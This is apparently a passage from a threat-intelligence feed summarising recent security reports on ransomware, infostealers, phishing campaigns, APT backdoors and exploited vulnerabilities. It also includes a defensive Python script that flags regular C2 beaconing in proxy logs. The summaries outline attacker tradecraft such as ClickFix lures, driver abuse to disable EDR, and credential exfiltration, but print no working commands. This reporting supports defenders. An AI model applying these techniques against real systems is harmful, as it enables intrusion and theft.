Researchers at Cisco Talos have uncovered a new ransomware campaign in which attackers abuse Velociraptor, an open-source DFIR tool, to stay hidden and maintain long-term access in compromised networks. The campaign is believed to be linked to the China-based group Storm-2603, which is known for exploiting the ToolShell vulnerabilities in on-premises SharePoint. In this campaign, the attackers deployed an outdated Velociraptor build containing a privilege escalation flaw (CVE-2025-6264) to gain full control over systems. They also used Visual Studio Code to establish a tunnel to their remote C2 server. Subsequently, the attackers deployed Warlock, LockBit, and Babuk ransomware to encrypt both Windows servers and VMware ESXi virtual machines. Additionally, the attackers created admin accounts, accessed the vSphere console, disabled Microsoft Defender protections, and used PowerShell scripts to exfiltrate data quietly while evading detection.
Source: https://blog.talosintelligence.com/velociraptor-leveraged-in-ransomware-attacks/
2025-10-08
Fake_Job_Phishing_Targets_Marketers
HIGH
+
Intel Source:
Cofense
Intel Name:
Fake_Job_Phishing_Targets_Marketers
Date of Scan:
2025-10-08
Impact:
HIGH
Summary:
Researchers at Cofense Phishing Defense Center have identified a sophisticated phishing campaign impersonating major brands including Tesla, Google, Ferrari, and Red Bull to target marketing and social media professionals seeking remote work. The threat actors crafted realistic recruitment emails using spoofed sender domains associated with legitimate services to evade security filters and establish credibility. Victims were enticed to engage with fake job postings that redirected them through multiple counterfeit login portals designed to capture credentials and personal data. The phishing infrastructure replicated trusted sites such as Glassdoor, Facebook, and Google to enhance legitimacy and exploit job seekers’ familiarity with online hiring platforms.
Source: https://cofense.com/blog/phishing-from-home-the-hidden-danger-in-remote-jobs
2025-10-08
GhostSocks_MaaS_Turns_Victims_Into_Proxy_Nodes
HIGH
+
Intel Source:
Synthient Research
Intel Name:
GhostSocks_MaaS_Turns_Victims_Into_Proxy_Nodes
Date of Scan:
2025-10-08
Impact:
HIGH
Summary:
Synthient researchers have reported on GhostSocks, a Malware-as-a-Service (MaaS) offering that has been sold since October 2023 on a Russian-language cybercrime forum. GhostSocks enables threat actors to convert compromised machines into SOCKS5 residential proxies, which are primarily used to facilitate fraud and provide anonymity services. Developed in Golang and obfuscated using the open-source garble project, the malware is subscription-based and lacks persistence, focusing solely on deploying and managing SOCKS5 proxy functionality. Operators manage infections through a web-based panel that supports geo-filtering, account management, and API integrations. Adoption of GhostSocks surged in 2024 following a partnership with Lumma Stealer, which began bundling GhostSocks as a monetization add-on, enabling operators both to exfiltrate sensitive data and to monetize infected systems by reselling them as proxy nodes. Leaked 2025 chat logs from the BlackBasta ransomware group confirmed interest in GhostSocks as a tool for maintaining long-term access and generating revenue. On execution, GhostSocks creates a mutex (“start to run”), decrypts its relay configuration from the %TEMP% directory (or falls back to hard-coded C2s), and registers with its C2 infrastructure via HTTP using unique credentials. Once registered, it establishes a SOCKS5 proxy using the go-socks5 and yamux libraries. The result is a dual-impact threat: victims are first compromised and then exploited again as their devices are repurposed for criminal proxy services.
Source: https://synthient.com/blog/ghostsocks-from-initial-access-to-residential-proxy
2025-10-08
Phishing_Scam_Impersonates_1Password_Alerts
MEDIUM
+
Intel Source:
Malware Bytes
Intel Name:
Phishing_Scam_Impersonates_1Password_Alerts
Date of Scan:
2025-10-08
Impact:
MEDIUM
Summary:
Malwarebytes researchers have identified a targeted phishing attack that impersonated 1Password’s Watchtower alerts to steal users’ vault credentials. The phishing email claimed that the recipient’s password had been exposed in a data breach and urged them to take immediate action. When victims clicked the embedded link, they were redirected through a third-party email tracker to a spoofed 1Password website designed to closely mimic the legitimate one. The fake login page requested the user’s email address, Secret Key, and master password, the three secrets that together grant full access to a 1Password vault. A successful compromise could have resulted in widespread account takeovers, as the stolen vault contents would expose login credentials for multiple other services.
Source: https://www.malwarebytes.com/blog/news/2025/10/phishers-target-1password-users-with-convincing-fake-breach-alert
2025-10-07
ToddyCat_and_Others_DLL_Sideloading_via_ML_Detection
HIGH
+
Intel Source:
Securelist (Kaspersky)
Intel Name:
ToddyCat_and_Others_DLL_Sideloading_via_ML_Detection
Date of Scan:
2025-10-07
Impact:
HIGH
Summary:
Researchers at Kaspersky have identified multiple real-world DLL hijacking incidents using a newly deployed machine-learning model integrated into the Kaspersky Unified Monitoring and Analysis Platform (SIEM). The model was designed to automatically detect anomalous DLL load events by analyzing local attributes such as process paths, file hashes, and behavioral indicators, improving the accuracy of threat detection while reducing false positives. During pilot testing, the system successfully identified several attacks leveraging DLL sideloading for persistence and execution. In one case, the ToddyCat advanced persistent threat group exploited a SharePoint vulnerability to deploy a malicious payload through a hijacked system library, resulting in the execution of a remote access implant. Other detections included an infostealer disguised as a policy management module that exfiltrated browser data and a malicious loader delivered via removable media posing as legitimate antivirus software.
Source: https://securelist.com/detecting-dll-hijacking-with-machine-learning-in-kaspersky-siem/117567/
2025-10-07
Exploitation_of_GoAnywhere_MFT_Vulnerability
MEDIUM
+
Intel Source:
Microsoft
Intel Name:
Exploitation_of_GoAnywhere_MFT_Vulnerability
Date of Scan:
2025-10-07
Impact:
MEDIUM
Summary:
Researchers from Microsoft have observed active exploitation of a critical deserialization vulnerability (CVE-2025-10035) in GoAnywhere MFT’s License Servlet Admin Console. This vulnerability allows attackers to bypass signature verification using a forged license response, leading to command injection and potential RCE. Microsoft attributed the activity to Storm-1175, a threat group known for exploiting public-facing applications for initial access. The actor deployed RMM tools such as SimpleHelp and MeshAgent, along with malicious .jsp files within GoAnywhere directories to maintain persistence. The threat actor conducted system and network discovery using built-in commands and tools like netscan and achieved lateral movement through mstsc.exe. They leveraged the RMM tools and a Cloudflare tunnel to establish secure C2 communication. The campaign demonstrates a complete attack chain—from initial access to impact—covering persistence, discovery, lateral movement, C2, exfiltration, and ransomware execution.
Source: https://www.microsoft.com/en-us/security/blog/2025/10/06/investigating-active-exploitation-of-cve-2025-10035-goanywhere-managed-file-transfer-vulnerability/
2025-10-07
Oracle_EBS_Unauthenticated_RCE_Exploit
HIGH
+
Intel Source:
Oracle
Intel Name:
Oracle_EBS_Unauthenticated_RCE_Exploit
Date of Scan:
2025-10-07
Impact:
HIGH
Summary:
Researchers at Oracle have identified a critical vulnerability, CVE-2025-61882, affecting the Oracle E-Business Suite (EBS), specifically versions 12.2.3 through 12.2.14. The flaw resides in the BI Publisher Integration component and allows unauthenticated remote code execution (RCE) over HTTP, enabling attackers to execute arbitrary commands without requiring credentials. The issue carries a CVSS 3.1 score of 9.8, indicating severe exploitation potential. Successful attacks could result in full system compromise, unauthorized data access, and operational disruption across enterprise environments that rely on Oracle EBS for financial and business process automation. Oracle advises that the vulnerability can be triggered remotely with low complexity and no prior access, making it an attractive target for threat actors seeking lateral movement within ERP-connected infrastructures.
Source: https://www.oracle.com/security-alerts/alert-cve-2025-61882.html
2025-10-07
Rhadamanthys_Stealer_Gains_New_Evasion_Features
HIGH
+
Intel Source:
Check Point Research
Intel Name:
Rhadamanthys_Stealer_Gains_New_Evasion_Features
Date of Scan:
2025-10-07
Impact:
HIGH
Summary:
Researchers at Check Point have reported significant updates to Rhadamanthys, a multi-modular information stealer first released in 2022 and originally based on the Hidden Bee project. Now marketed under the names “RHAD Security” and “Mythical Origin Labs” across underground forums, Telegram, and Tor, Rhadamanthys has evolved into a mature Malware-as-a-Service (MaaS) platform. The latest version, 0.9.2, reflects major enhancements including revamped executable formats (XS1_B and XS2_B), removal of legacy registry key dependencies, and new mutex generation methods that render earlier defensive signatures obsolete. Sold in tiered pricing plans ranging from $299 to $499 per month—with enterprise options available—the stealer now boasts professional-grade infrastructure, indicating long-term operational intent. Version 0.9.2 introduces advanced anti-analysis techniques modeled after Lumma, enhanced sandbox evasion modules, and a new payload delivery mechanism using PNG files in place of earlier WAV or JPG-based steganography. Additional features include RC4-based string encryption, randomized injection targets, and obfuscated configuration data. Rhadamanthys targets a wide range of applications—including browsers, cryptocurrency wallets (now including Ledger Live), 2FA utilities, email clients, VPNs, and messaging platforms.
Source: https://research.checkpoint.com/2025/rhadamanthys-0-9-x-walk-through-the-updates/
2025-10-06
YUREI_RANSOMWARE
HIGH
+
Intel Source:
Cyfirma
Intel Name:
YUREI_RANSOMWARE
Date of Scan:
2025-10-06
Impact:
HIGH
Summary:
Researchers at CYFIRMA have identified a new ransomware strain called Yurei, which specifically targets Windows systems. Yurei is designed to encrypt files rapidly while simultaneously obstructing recovery and forensic analysis. It deletes backups and Windows shadow copies, clears system logs, and alters file timestamps to hinder investigation. The ransomware spreads across networks through SMB shares, removable drives, and credential-based lateral movement techniques similar to PsExec. It stages payloads in temporary directories, leverages PowerShell scripts during execution, and changes the desktop wallpaper to signal compromise. Yurei employs ChaCha20 encryption with a unique key generated per file. Victims face a double-extortion tactic, involving both ransom demands for decryption and threats of data leaks. Communication and victim shaming are conducted via Tor-based websites. Researchers also observed that Yurei shares code similarities with the open-source Prince ransomware.
Source: https://www.cyfirma.com/research/yurei-ransomware-the-digital-ghost/
2025-10-05
Confucius_Espionage_Campaign_Evolves_to_Python_Backdoor
MEDIUM
+
Intel Source:
FortiGuard Labs
Intel Name:
Confucius_Espionage_Campaign_Evolves_to_Python_Backdoor
Date of Scan:
2025-10-05
Impact:
MEDIUM
Summary:
FortiGuard Labs reports that the Confucius cyber-espionage group, active since 2013, has continued to evolve its tactics and toolset in recent campaigns. The group is believed to have state sponsorship and primarily targets South Asian government agencies, military organizations, defense contractors, and critical industries. Initially relying on document stealers like WooperStealer, Confucius has transitioned to more advanced payloads, including custom Python-based backdoors such as AnonDoor. Its initial access vectors frequently involve spear-phishing emails carrying malicious Office documents or LNK files. The campaigns show a consistent layering of obfuscation and persistence techniques such as DLL side-loading, registry modifications, and scheduled task abuse. Victim systems are profiled in detail, with exfiltration including documents, images, archives, and communication files. The latest Python-based AnonDoor variant demonstrates advanced command execution, file manipulation, and credential theft capabilities.
Source: https://www.fortinet.com/blog/threat-research/confucius-espionage-from-stealer-to-backdoor
2025-10-05
RomCom_Hybrid_Espionage_Ransomware_Actor
HIGH
+
Intel Source:
Picus Security
Intel Name:
RomCom_Hybrid_Espionage_Ransomware_Actor
Date of Scan:
2025-10-05
Impact:
HIGH
Summary:
Researchers at Picus Security have identified RomCom, also tracked as Storm-0978, Tropical Scorpius, and Void Rabisu, as an evolving hybrid threat actor that blends state-aligned espionage with financially motivated ransomware operations. Originally operating in Eastern Europe, RomCom has expanded campaigns since 2023 to target government, defense, financial, manufacturing, logistics, retail, and hospitality sectors across Europe and North America. The actor employs spear-phishing, social engineering, and zero-day exploitation to gain access, followed by the deployment of multi-stage loaders and custom malware families such as SnipBot, RustyClaw, SlipScreen, DustyHammock, and ShadyHammock. Post-compromise activity includes credential theft through SAM hive dumping, lateral movement with SMBExec and WMIExec, and reconnaissance using custom tools to map victim environments.
Source: https://www.picussecurity.com/resource/blog/romcom-threat-actor-evolution
2025-10-05
SORVEPOTEL_WhatsApp_Malware_Spreading_in_Brazil
MEDIUM
+
Intel Source:
Trend Micro
Intel Name:
SORVEPOTEL_WhatsApp_Malware_Spreading_in_Brazil
Date of Scan:
2025-10-05
Impact:
MEDIUM
Summary:
Researchers at Trend Micro have identified a self-propagating malware campaign, dubbed SORVEPOTEL, actively spreading through malicious ZIP attachments shared over WhatsApp. Once executed, the malware establishes persistence on Windows systems, hijacks active WhatsApp sessions, and automatically sends copies of itself to all of a victim’s contacts and groups, driving rapid propagation. Campaign telemetry shows a strong concentration of activity in Brazil, with the majority of detected cases occurring there. Victim organizations include government, public services, manufacturing, technology, education, and construction sectors, indicating that the campaign extends beyond individual consumers. The attack chain relies on phishing messages crafted in Portuguese and disguised as receipts, budgets, or other common documents, leveraging trust in personal and professional communications.
Source: https://www.trendmicro.com/en_gb/research/25/j/self-propagating-malware-spreads-via-whatsapp.html
2025-10-04
WARMCOOKIE_Backdoor_Evolves_With_New_Handlers_and_C2
MEDIUM
+
Intel Source:
Elastic
Intel Name:
WARMCOOKIE_Backdoor_Evolves_With_New_Handlers_and_C2
Date of Scan:
2025-10-04
Impact:
MEDIUM
Summary:
Researchers at Elastic Security Labs have published an updated analysis of the WARMCOOKIE backdoor, reporting that it continues to evolve with new command handlers and changes to its command-and-control (C2) implementation.
Source: https://www.elastic.co/security-labs/revisiting-warmcookie
2025-10-04
XiebroC2_Framework
MEDIUM
+
Intel Source:
ASEC
Intel Name:
XiebroC2_Framework
Date of Scan:
2025-10-04
Impact:
MEDIUM
Summary:
ASEC researchers have uncovered a campaign targeting internet-exposed Microsoft SQL servers through stolen credentials. Once attackers gained access, they leveraged privilege escalation tools from the Potato family to take full control of the system. They then deployed XiebroC2, an open-source C2 framework written in Go that runs on Windows, Linux, and macOS. The implant provides a wide range of capabilities, including remote command execution, reverse shells, file and process management, proxying, screenshots, and network monitoring. The attackers downloaded the payload through PowerShell and connected to hard-coded C2 servers. Prior to adopting XiebroC2, the attackers had used the same access for cryptocurrency mining, a common method of monetizing compromised systems.
Source: https://asec.ahnlab.com/ko/90326/
2025-10-04
XWorm_V6_Plugins
HIGH
+
Intel Source:
Trellix
Intel Name:
XWorm_V6_Plugins
Date of Scan:
2025-10-04
Impact:
HIGH
Summary:
Trellix reports the unexpected return of XWorm in version 6, following its abandonment in late 2024. Originally developed by an actor known as XCoder, the malware resurfaced in mid-2025 through an account called XCoderTools, sparking debate on whether it is a continuation or an opportunistic rebrand. XWorm V6 maintains its modular design, allowing operators to deploy numerous plugins for tasks such as remote desktop control, credential theft, data exfiltration, surveillance, and ransomware deployment. Delivery commonly occurs via phishing emails that drop malicious JavaScript, PowerShell loaders, and DLL-based injectors, enabling stealthy execution and persistence. The plugin library includes capabilities for screen capture, process and file manipulation, TCP connection hijacking, and webcam activation. Stealer-focused modules target credentials from browsers, email clients, messaging platforms, and cryptocurrency wallets. The ransomware plugin encrypts user data and drops ransom notes, sharing notable code overlap with the earlier NoCry ransomware family.
Source: https://www.trellix.com/blogs/research/xworm-v6-exploring-pivotal-plugins/
2025-10-03
COLDRIVER_BAITSWITCH_and_SIMPLEFIX_Backdoors
HIGH
+
Intel Source:
Zscaler
Intel Name:
COLDRIVER_BAITSWITCH_and_SIMPLEFIX_Backdoors
Date of Scan:
2025-10-03
Impact:
HIGH
Summary:
Researchers at Zscaler ThreatLabz have observed the Russia-linked APT group COLDRIVER refreshing its intrusion playbook with a multi-stage sequence that begins on a ClickFix lure page and culminates in persistent PowerShell access. The lure coaxes targets into pasting a malicious command in the Windows Run dialog, which fetches a downloader DLL named BAITSWITCH. BAITSWITCH writes itself for logon persistence, retrieves staged components, and stores an AES-encrypted PowerShell stager in the registry. On the next user logon, that stager decrypts and launches the SIMPLEFIX backdoor, which communicates over HTTPS while masquerading as the Edge browser user-agent and checks in roughly every three minutes. SIMPLEFIX supports system reconnaissance, selective file harvesting from user directories, and retrieval or execution of follow-on payloads to extend control. Victimology aligns with COLDRIVER’s long-running focus on Russian civil-society actors, NGOs, and policy researchers across Russia and allied Western nations.
Source: https://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix
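The roughly three-minute check-in over HTTPS with a browser user-agent, as described for SIMPLEFIX above, is the kind of traffic that looks like Edge in any single log line and only stands out in aggregate. The Python below is an added example for this feed, not Zscaler's code: it groups proxy events by client and destination and flags pairs whose inter-request intervals are regular (low coefficient of variation) at a plausible beacon period. The events and hostnames are constructed; the thresholds are assumptions to tune against your own baseline.

```python
import statistics
from collections import defaultdict

# Constructed proxy events (not Zscaler telemetry): (epoch, client_ip, dst_host, user_agent).
EDGE_UA = ('Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '
           'Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0')
SAMPLE_EVENTS = [
    (1760000000, '10.1.1.7', 'cdn-sync.example.test', EDGE_UA),
    (1760000010, '10.1.1.7', 'portal.example.test', EDGE_UA),
    (1760000055, '10.1.1.7', 'portal.example.test', EDGE_UA),
    (1760000181, '10.1.1.7', 'cdn-sync.example.test', EDGE_UA),
    (1760000360, '10.1.1.7', 'cdn-sync.example.test', EDGE_UA),
    (1760000400, '10.1.1.7', 'portal.example.test', EDGE_UA),
    (1760000405, '10.1.1.7', 'portal.example.test', EDGE_UA),
    (1760000542, '10.1.1.7', 'cdn-sync.example.test', EDGE_UA),
    (1760000600, '10.1.1.9', 'cdn-sync.example.test', EDGE_UA),
    (1760000720, '10.1.1.7', 'cdn-sync.example.test', EDGE_UA),
    (1760000899, '10.1.1.7', 'cdn-sync.example.test', EDGE_UA),
    (1760001200, '10.1.1.7', 'portal.example.test', EDGE_UA),
]


def find_beacons(events, min_hits=5, max_jitter=0.2, min_interval=30, max_interval=3600):
    """Group requests by (client, destination) and flag pairs whose timing is regular:
    at least `min_hits` requests, median interval inside [min_interval, max_interval] seconds,
    and coefficient of variation (pstdev/mean of the intervals) at most `max_jitter`."""
    by_pair = defaultdict(list)
    uas = defaultdict(set)
    for ts, client, dst, ua in events:
        by_pair[(client, dst)].append(ts)
        uas[(client, dst)].add(ua)
    beacons = {}
    for pair, stamps in by_pair.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        intervals = [b - a for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(intervals)
        if mean == 0:
            continue
        jitter = statistics.pstdev(intervals) / mean
        median = statistics.median(intervals)
        if min_interval <= median <= max_interval and jitter <= max_jitter:
            beacons[pair] = {'count': len(stamps), 'median_interval': median,
                             'jitter': round(jitter, 4), 'user_agents': sorted(uas[pair])}
    return beacons


if __name__ == '__main__':
    for (client, dst), info in find_beacons(SAMPLE_EVENTS).items():
        print(f'{client} -> {dst}: every ~{info["median_interval"]}s, '
              f'{info["count"]} hits, jitter {info["jitter"]}')
```

The user-agent is reported rather than filtered on, because a claimed Edge UA proves nothing by itself; the useful follow-up is to join the flagged client against endpoint telemetry and confirm whether msedge.exe, or a PowerShell process, originated the connections.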
2025-10-02
PureCoder_PureHVNC_RAT_and_Sliver_Intrusion
HIGH
+
Intel Source:
CheckPoint
Intel Name:
PureCoder_PureHVNC_RAT_and_Sliver_Intrusion
Date of Scan:
2025-10-02
Impact:
HIGH
Summary:
Researchers at Check Point Research have identified an eight-day intrusion campaign leveraging the ClickFix phishing technique to deploy components of the Pure malware ecosystem. Victims were enticed with fake job advertisements that led to the execution of malicious PowerShell, ultimately delivering the PureHVNC RAT. Over the course of the attack, operators introduced a Rust-based loader with persistence mechanisms and later transitioned to using the Sliver command-and-control framework. PureHVNC enabled covert remote access and included a broad plugin system supporting keylogging, audio and video capture, credential theft, distributed denial-of-service operations, and proxying capabilities. Technical analysis revealed advanced evasion methods, including anti-sandbox checks, AMSI bypass, obfuscation, and privilege escalation routines. Attribution linked the malware and supporting infrastructure to PureCoder, a developer known for producing modular malware such as PureCrypter, PureLogs, and PureMiner, with sales conducted via underground channels.
Source: https://research.checkpoint.com/2025/under-the-pure-curtain-from-rat-to-builder-to-coder/
2025-10-02
Gunra_Ransomware_Targets_Global_Sectors
HIGH
+
Intel Source:
The Raven File
Intel Name:
Gunra_Ransomware_Targets_Global_Sectors
Date of Scan:
2025-10-02
Impact:
HIGH
Summary:
Researchers at THE RAVEN FILE have identified Gunra as a newly emerged ransomware operation leveraging a double-extortion model, where threat actors exfiltrate and encrypt victim data before issuing steep ransom demands. Initial access is achieved through spear-phishing emails and a custom loader, followed by lateral movement using proprietary tools branded GUNRA. Once privileged access is obtained, the group encrypts up to 9 TB of data within 48 hours using Salsa20/ChaCha20 encryption and deletes over 60 shadow-copy backups to disrupt recovery. Gunra supports both Windows (EXE) and Linux (ELF) binaries, indicating active development and cross-platform reach. Victimology includes at least 18 organizations across manufacturing, healthcare, technology, finance, and services sectors, spanning South Korea, Brazil, Japan, Canada, the UAE, Egypt, Panama, and various Latin American and European countries, while notably excluding U.S.-based entities. Ransom negotiations are conducted through a Tor-based, WhatsApp-themed portal integrated with Slack, with demands ranging from 13 BTC to USD 10 million, though actors often settle for less—suggesting limited maturity. If payment is refused, stolen data are leaked via Tor sites or temporary clearnet mirrors.
Source: https://theravenfile.com/2025/09/23/gunra-ransomware-what-you-dont-know/
2025-10-01
Silver_Fox_APT_Hijacks_Trusted_Chinese_Domains
MEDIUM
+
Intel Source:
ThreatBook
Intel Name:
Silver_Fox_APT_Hijacks_Trusted_Chinese_Domains
Date of Scan:
2025-10-01
Impact:
MEDIUM
Summary:
Researchers at ThreatBook have identified Silver Fox, a Chinese black-market threat group leveraging advanced persistent threat (APT)-level tactics to mass-compromise Windows systems across government, education, and enterprise environments. The group exploits a remote code execution (RCE) vulnerability in kkFileView to plant trojanised software installers on legitimate .gov[.]cn, university, and corporate domains. These malicious installers impersonate widely used applications like DingTalk and Lark, with phishing documents and QR codes directing victims to trusted download links—effectively bypassing basic URL filtering. Once executed, a multistage loader chain leverages COM objects, ActiveX controls, and living-off-the-land binaries (LOLBins) to deliver a .NET component that injects a DLL and executes in-memory shellcode, granting full remote access, including screen viewing, audio capture, keylogging, file manipulation, and system reboots. Silver Fox further escalates its access by deploying vulnerable yet Microsoft-signed drivers (BYOVD), such as amsdk.sys and ZAM.exe, to disable endpoint detection and response (EDR) tools and obtain SYSTEM-level privileges on Windows 7 through 11. Infected machines automatically propagate phishing QR codes through instant messaging platforms, facilitating internal lateral movement. At least 30 Chinese domains have been compromised to date.
Source: https://mp.weixin.qq.com/s?__biz=MzI5NjA0NjI5MQ==&mid=2650184647&idx=1&sn=441b82a644acf9e0eccdda1bd8ada20c&poc_token=HKQmyWijlFQyqZP7mwo0HTHkW-QQZlCu5QofQVOP
2025-10-01
CastleRAT_TAG_150_Remote_Access_Troja
HIGH
+
Intel Source:
Polyswarm
Intel Name:
CastleRAT_TAG_150_Remote_Access_Troja
Date of Scan:
2025-10-01
Impact:
HIGH
Summary:
Researchers at PolySwarm have identified CastleRAT, a newly documented remote access trojan deployed by the threat actor TAG-150 since March 2025. The group operates a multi-tiered command-and-control infrastructure and uses CastleLoader as an entry point to deliver secondary payloads, including CastleBot and CastleRAT. The malware exists in Python and C variants, with the latter enabling advanced surveillance features such as keylogging and screen capture. TAG-150 relies on phishing lures themed around Cloudflare “ClickFix” pages and fraudulent GitHub repositories, achieving high infection success rates among targeted users. The ecosystem is supported by public services for anti-detection and file sharing, highlighting adaptability and operational maturity. Targeting has primarily focused on organizations in the United States, with evidence suggesting potential links to ransomware operations, though attribution remains unconfirmed.
Source: https://blog.polyswarm.io/castlerat
2025-09-30
Nimbus_Manticore_Espionage_Ops_in_Europe_and_ME
HIGH
+
Intel Source:
Polyswarm
Intel Name:
Nimbus_Manticore_Espionage_Ops_in_Europe_and_ME
Date of Scan:
2025-09-30
Impact:
HIGH
Summary:
Researchers at PolySwarm have identified ongoing cyberespionage activity attributed to the Iranian state-linked threat group Nimbus Manticore, also known as Smoke Sandstorm or UNC1549. Since early 2025, the group has expanded operations against defense manufacturing, aerospace, telecommunications, satellite providers, and airlines across Western Europe and the Middle East. Its campaigns rely on spear-phishing emails impersonating HR recruiters, which lure victims to fraudulent career portals built with React templates and often deliver malicious payloads via Cloudflare-masked infrastructure. Nimbus Manticore employs two key malware families: MiniJunk, a heavily obfuscated backdoor capable of persistence, file manipulation, process execution, and covert command-and-control communications; and MiniBrowse, a lightweight stealer focused on harvesting browser credentials and exfiltrating data through JSON payloads. The group further strengthens operational security through DLL sideloading, certificate signing from trusted authorities, and resilient Azure-hosted C2 infrastructure.
Source: https://blog.polyswarm.io/nimbus-manticores-evolving-cyberespionage-campaign
2025-09-30
Lumma_Stealer_Delivered_via_Nullsoft_Installer
MEDIUM
+
Intel Source:
Netskope
Intel Name:
Lumma_Stealer_Delivered_via_Nullsoft_Installer
Date of Scan:
2025-09-30
Impact:
MEDIUM
Summary:
Researchers at Netskope uncovered a new campaign delivering Lumma Stealer through a Nullsoft (NSIS) installer that leverages the legitimate AutoIt runtime to execute a hidden script. The installer drops an obfuscated batch file that renames and launches AutoIt, which then interprets an embedded script to continue execution. The stealer employs several evasion tactics, including environment checks, anti-debugging delays, analysis blocks, and DLL unhooking to bypass security tools. It establishes persistence by adding a shortcut in the Windows Startup folder, then decrypts and decompresses its main payload directly in memory. Although C2 activity was not observed because the servers were inactive, the behavior strongly aligns with known Lumma Stealer operations. Victim organizations were identified across the telecom, healthcare, banking, and marketing sectors worldwide.
Source: https://www.netskope.com/blog/beyond-signatures-detecting-lumma-stealer-with-an-ml-powered-sandbox
2025-09-30
SonicWall_VPN_Exploited_for_Rapid_Ransomware
HIGH
Intel Source:
Arctic Wolf
Intel Name:
SonicWall_VPN_Exploited_for_Rapid_Ransomware
Date of Scan:
2025-09-30
Impact:
HIGH
Summary:
Researchers at Arctic Wolf Labs have identified a widespread ransomware campaign exploiting SonicWall SSL VPN appliances through CVE-2024-40766 and stolen credentials. The threat actors demonstrated rapid intrusion methods, progressing from initial access to full encryption in under an hour in many cases. Once inside networks, they moved laterally, harvested Active Directory credentials, and extracted secrets from Veeam backup databases. They deployed legitimate remote management tools such as RustDesk and AnyDesk, as well as Cloudflare Tunnel, to maintain persistence and control. To evade defenses, the actors employed user account control bypasses, DLL sideloading, and bring-your-own-vulnerable-driver techniques to disable security software. Data was staged with compression tools and exfiltrated via FTP before encryption. The ransomware payloads then targeted both Windows servers and virtualized environments, maximizing operational disruption.
Source: https://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/
2025-09-29
Malicious_Rust_crates_Wallet_key_theft
MEDIUM
Intel Source:
Socket
Intel Name:
Malicious_Rust_crates_Wallet_key_theft
Date of Scan:
2025-09-29
Impact:
MEDIUM
Summary:
Researchers at Socket have identified two typosquatted Rust crates, faster_log and async_println, that impersonate the legitimate fast_log logger. The rogue packages preserve normal logging functionality but embed code that recursively scans local Rust projects for Solana and Ethereum private keys as well as raw byte arrays resembling wallet seed phrases. Matched secrets, together with file path and line context, are packaged into a JSON payload and silently exfiltrated via an HTTPS POST to a hard-coded endpoint masquerading as a blockchain RPC service. Because the crates are pure Rust, the malicious logic executes on Linux, macOS and Windows wherever a Rust compiler is present, including developer laptops and CI pipelines. Download statistics show 8,424 pulls between 25 May 2025 and takedown, demonstrating measurable exposure.
Source: https://socket.dev/blog/two-malicious-rust-crates-impersonate-popular-logger-to-steal-wallet-keys?utm_medium=feed
2025-09-29
Tycoon2FA_Targets_UK_Telecoms
MEDIUM
Intel Source:
Any.Run
Intel Name:
Tycoon2FA_Targets_UK_Telecoms
Date of Scan:
2025-09-29
Impact:
MEDIUM
Summary:
Researchers at ANY.RUN have uncovered a large-scale phishing campaign targeting UK telecommunications companies through the Tycoon2FA phishing kit. The attackers distribute spoofed DocuSign-style emails containing PDF attachments that entice recipients into clicking a Review and Sign button. Victims are then redirected to fraudulent Microsoft 365 login pages designed to bypass two-factor authentication and steal credentials. The campaign primarily targets a major British telecom group operating in 180 countries, but spill-over into media companies has also been observed. By compromising cloud identities, attackers gain persistent access that could enable data theft and lateral movement and potentially disrupt communications services.
Source: https://any.run/cybersecurity-blog/fighting-telecom-attacks-with-anyrun/
2025-09-29
SVG_Phishing_Campaign_Targets_Ukraine
MEDIUM
Intel Source:
Fortinet
Intel Name:
SVG_Phishing_Campaign_Targets_Ukraine
Date of Scan:
2025-09-29
Impact:
MEDIUM
Summary:
FortiGuard researchers have uncovered a phishing campaign targeting Ukraine that masquerades as the National Police of Ukraine. Victims receive malicious SVG attachments that lead to the download of a password-protected archive containing a CHM file. The CHM file executes an HTA-based loader, known as CountLoader, which establishes communication with a C2 server, gathers system details, and facilitates the delivery of additional malware. The campaign primarily deploys two payloads. PureMiner is a stealthy .NET-based cryptominer that verifies system hardware capabilities before injecting itself into processes to mine cryptocurrency; it leverages encrypted communication and can remove its persistence mechanisms when instructed by the operators. Amatera Stealer is a Python-based infostealer that executes filelessly in memory; it harvests a wide range of data, including browser credentials, cookies, cryptocurrency wallets, Steam and Telegram data, as well as files specified by custom rules.
Source: https://www.fortinet.com/blog/threat-research/svg-phishing-hits-ukraine-with-amatera-stealer-pureminer
2025-09-29
Larva_25004_Signed_Messenger_Update_Malware
HIGH
Intel Source:
ASEC
Intel Name:
Larva_25004_Signed_Messenger_Update_Malware
Date of Scan:
2025-09-29
Impact:
HIGH
Summary:
Researchers at ASEC have identified Larva-25004, a North Korea-linked intrusion set that since at least August 2023 has targeted South Korean defense contractors, public enterprises, and government research institutes with spear-phishing emails carrying digitally signed droppers disguised as routine documents. The operators steal South Korean code-signing certificates to sign JSE, PIF, and SCR loaders, helping the payloads evade application-control and reputation checks. Beyond phishing, the group compromised internally hosted Bizbox Alpha messenger update servers and substituted the legitimate updater, turning routine software updates into a supply-chain infection vector that automatically delivers malware to connected workstations. Deployed toolsets include the custom backdoors HttpSpy, Memload, and HttpTroy, an InfoStealer module, and a proxy implant that together provide full remote control, credential harvesting, and data-exfiltration capability.
Source: https://asec.ahnlab.com/ko/90292/
2025-09-28
Moq_RAT_LNK_to_LOLBin_infection
MEDIUM
Intel Source:
K7 Labs
Intel Name:
Moq_RAT_LNK_to_LOLBin_infection
Date of Scan:
2025-09-28
Impact:
MEDIUM
Summary:
Researchers at K7 Security Labs have observed a Windows shortcut campaign that delivers a multi-stage Remote Access Trojan (RAT) named Moq through Discord-hosted lure files. The malicious .lnk silently invokes embedded PowerShell that fetches a compressed payload, extracts Moq.dll, and launches it via the native odbcconf.exe binary to bypass application controls. Once active, the malware disables AMSI and ETW telemetry, implants persistence under the current user’s Winlogon shell registry key, and calls a hard-coded command server for tasking. Operators can execute arbitrary PowerShell, capture screenshots, enumerate security products, and exfiltrate selected files to cloud storage, giving them durable hands-on-keyboard access. Telemetry cited in the report places early activity in Israel, though no specific industry verticals are named. The reliance on built-in Windows utilities and in-memory patching significantly hampers traditional signature-based detection and complicates forensic reconstruction.
Source: https://labs.k7computing.com/index.php/from-lnk-to-rat-deep-dive-into-the-lnk-malware-infection-chain/
2025-09-28
Zloader_Updated_Version
